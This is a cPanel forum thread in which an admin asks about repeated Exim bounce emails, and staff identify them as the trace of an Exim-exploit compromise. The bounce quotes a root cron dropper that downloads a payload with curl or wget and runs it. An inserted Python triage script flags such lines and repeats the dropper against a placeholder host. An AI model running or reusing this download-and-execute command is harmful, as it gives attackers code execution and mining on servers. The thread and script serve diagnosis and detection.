Mail delivery failed: returning message to sender

slideloft

Member
May 8, 2013
cPanel Access Level
Root Administrator
Hi.

I upgraded my cPanel after the Exim exploit and ever since then I have been getting emails in the queue that contain the following.

Code:
--1561246082-eximdsn-632408078
Content-type: text/plain; charset=us-ascii

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

[email protected]
root cannot accept local mail deliveries

--1561246082-eximdsn-632408078
Content-type: message/delivery-status

Reporting-MTA: dns; server.example.com

Action: failed
Final-Recipient: rfc822;[email protected]
Status: 5.0.0

--1561246082-eximdsn-632408078
Content-type: text/rfc822-headers

Return-path: <[email protected]>
Received: from root by mega.example.com with local (Exim 4.92)
(envelope-from <[email protected]>)
id 1hepQP-00074l-Uw
for [email protected]; Sat, 22 Jun 2019 23:28:02 +0000
From: [email protected] (Cron Daemon)
To: [email protected]
Subject: Cron <[email protected]> tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <[email protected]>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.net/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.example.org/src/ldm -o /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.net/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.tld/src/ldm -O /root/.cache/.ntp||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.example.org/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
Content-Type: text/plain; charset=ANSI_X3.4-1968
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
X-Cron-Env: <USER=root>
Message-Id: <[email protected]>
Date: Sat, 22 Jun 2019 23:28:01 +0000
X-Exim-DSN-Information: Due to administrative limits only headers are returned


--1561246082-eximdsn-632408078--
How can I fix this? I am getting mails every 2 minutes.
 


Last edited by a moderator:
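A triage script, added here as an example (not code from the thread or from cPanel), that parses a bounce shaped like the one above and reports which of the behaviours visible in the cron line are present. The bounce is a constructed, trimmed sample and the download host is a placeholder, since the moderator removed the real URLs.

```python
"""Flag a cron-driven dropper from the Exim DSN bounce it generates (added example)."""
import re
from email import message_from_string

# Constructed sample modelled on the bounce in the post; the download host is a
# placeholder because the moderator removed the real URLs.
SAMPLE_BOUNCE = """\
Subject: Mail delivery failed: returning message to sender
Content-Type: multipart/report; report-type=delivery-status; boundary="b1"

--b1
Content-type: text/rfc822-headers

From: root@server.example.com (Cron Daemon)
Subject: Cron <root@server> if [ $(cat /etc/hosts|grep -i "tor2web"|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts; fi; (curl -fsSLk https://PLACEHOLDER.invalid/src/ldm -o /root/.cache/.ntp||wget --no-check-certificate https://PLACEHOLDER.invalid/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp
X-Cron-Env: <USER=root>

--b1--
"""

# (name, pattern) pairs taken from the behaviour visible in the post's cron line.
INDICATORS = [
    ("runs as root", re.compile(r"^Cron <root@")),
    ("hidden dotfile under /root/.cache", re.compile(r"/root/\.cache/\.\w+")),
    ("TLS verification disabled", re.compile(r"--no-check-certificate|\s-fsSLk\b")),
    ("curl/wget fallback chain", re.compile(r"curl\s.*\|\|.*wget\s")),
    ("overwrites /etc/hosts", re.compile(r">\s*/etc/hosts")),
    ("download then execute", re.compile(r"chmod \+x (\S+) && /bin/sh \1")),
]


def extract_cron_subject(bounce):
    """Return the bounced message's Subject from the text/rfc822-headers part, else None."""
    for part in message_from_string(bounce).walk():
        if part.get_content_type() == "text/rfc822-headers":
            return message_from_string(part.get_payload()).get("Subject")
    return None


def score_cron_command(subject):
    """Return the names of every indicator that matches a cron Subject line."""
    return [name for name, rx in INDICATORS if rx.search(subject)]


def triage(bounce):
    """Full pipeline: bounce text in, list of matched indicator names out."""
    subject = extract_cron_subject(bounce)
    return score_cron_command(subject) if subject else []
```

Run `triage()` over each frozen bounce in the queue (`exim -Mvb <id>`) to see which ones carry the dropper rather than an ordinary root bounce; a clean root cron job matches only "runs as root".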

GOT

Get Proactive!
PartnerNOC
Apr 8, 2003
Chesapeake, VA
greenolivetree.net
cPanel Access Level
DataCenter Provider
It looks to me like your hostname is not a FQDN. Go to WHM and reset your hostname. This is a common problem with OpenVZ VMs, which I'd bet is what you have.

Only your host can fix the issue with the changing hostname every time you boot.
 

Infopro

cPanel Sr. Product Evangelist
Staff member
May 20, 2003
Pennsylvania
forums.cpanel.net
cPanel Access Level
Root Administrator
Checking Google for just a snip of your post:
Code:
/root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/
...and I found this link. Worth looking at this closer I think.
What does this entry in my server's crontab do?
In short, your server has been hacked and hackers are running a crypto miner on it. This is bad.
I've edited your post above to remove the URLs in it. They were very similar to the URLs mentioned at that link.


If you're unsure what to do here, you might want to look into hiring someone that can help you with this:
System Administration Services | cPanel Forums
 

cPanelLauren

Forums Analyst II
Staff member
Nov 14, 2017
Houston
cPanel Access Level
DataCenter Provider
1. The error here:

[email protected]
root cannot accept local mail deliveries

Indicates that you've not set the address for root's mail to be forwarded to in WHM>>Server Contacts>>Edit System Mail Preferences.

2. And by far the most important:

That cron output is associated with the Exim compromise. If you'd like for us to investigate to identify if your server is root compromised, we would be happy to. I also want to point out that there is no safe way to clean a root level compromise; if it is found that you have been affected (which I am almost certain you have), you will need to migrate. We also offer migrations for this.


If you'd like cPanel's support to assist, you can open a ticket using the link in my signature. Once open, please reply with the Ticket ID here so that we can update this thread with the resolution once the ticket is resolved.


Thanks!